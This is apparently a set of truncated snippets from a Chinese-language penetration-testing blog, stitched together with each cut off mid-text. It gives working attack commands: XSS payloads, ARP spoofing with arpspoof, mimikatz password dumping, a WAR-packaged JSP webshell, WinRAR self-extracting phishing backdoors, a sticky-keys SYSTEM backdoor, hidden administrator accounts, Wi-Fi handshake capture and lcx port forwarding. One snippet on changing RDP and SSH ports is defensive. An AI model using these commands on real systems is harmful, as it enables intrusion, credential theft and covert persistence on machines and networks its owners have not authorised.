1、基本语句12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061<script>alert(1)</script><script>prompt(1)</script><sc

0、简介​ 修改远程桌面和ssh的默认端口，可以简单预防被爆破的困扰。 ​ 注意！阿里云、腾讯云等，修改前一定…一定..一定.记得在安全组策略中放通端口。 1、远程桌面默认端口修改​ 打开注册表，修改PortNumber键值。 1计算机\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds

0、简介arp攻击又称为中间人攻击，是一种在局域网中使用的攻击手段。 1、断网攻击攻击时,目标网络断开。攻击结束后,目标网络恢复。 1234# 探测存活主机fping -a -g 192.168.118.1/24# arpspoof -i 网卡 -t 目标IP 网关arpspoof -i eth0 -t 192.168.118.138 192.168.118.2 2、arp欺骗arp欺骗

0、简介mimikatz可以获取Windows的账户密码 下载地址：https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200308-1 1、命令12345#日志记录所有操作log#获取用户密码privilege::debugsekurlsa::logonpasswords 2、保存内存procdump64 是微软官方出的一款

0、简介发现后台有war上传点，尝试拿一下webshell。 1、制作war木马[管理员模式]打开CMD，执行下面的命令 123cd "C:\Program Files\Java\jdk1.8.0_131\bin" # 制作war文件jar cvf shell.war xx.jsp 2、getshell上传shell.war木马文件，使用蚁剑或菜刀链接： http:/

0、简介WinRAR压缩程序有个设置自解压格式的功能，可以用来做后门或者钓鱼。 1、方法打开新建的压缩文件，上方有个自解压格式的功能。 设置过程： 运行效果： 注：可以配合shift后门使用，或者使用邮件附件方式进行钓鱼。 可以设置解压时替换或跳过已存在的文件

1、cmd命令连按5次shift键,可调出后门。运行explorer.exe可以进入桌面,权限是SYSTEM。 12# 使用管理员权限运行cmdcopy C:\windows\system32\cmd.exe C:\windows\system32\sethc.exe

0、简介提权成功后，维持权限可以添加隐藏账户。 1、命令行隐藏123# 创建用户时使用$符号,这样添加的用户,命令行不会显示net user hacker$ password /addnet localgroup administrators hacker$ /add 在计算机管理—>本地用户和组中，还是可以看到刚创建的用户 2、注册表隐藏 更改 HKEY_LOCAL_MACHIN

1、设置无线网卡12345678# 查看网卡信息iwconfig# 结束可能会影响网卡监听的进程airmon-ng check kill# 网卡设置为监听模式，完成后wlan0会变成wlan0monairmon-ng start wlan0# 探测附件WiFi信息airodump-ng wlan0mon 2、抓取数据包抓取连接成功的数据包，用来解密wifi密码。 12# airodump-ng

0、简介偶尔会遇到，拿下了webshell. 远程端口是开启的，但是远程不了，这可能遇到了部署在内网的服务器，终端端口没有映射到公网。这时我们就需要进行内网端口转发， 进而扩大成果。前提是需要一台公网主机，用来监听端口 。 1、lcx 使用方法首先用公网主机监听 9999 端口，等待接收数据，接收到数据之后把接收到的数据转发到公网主机的 1234 端口。 1234# vps监听 9999 端口，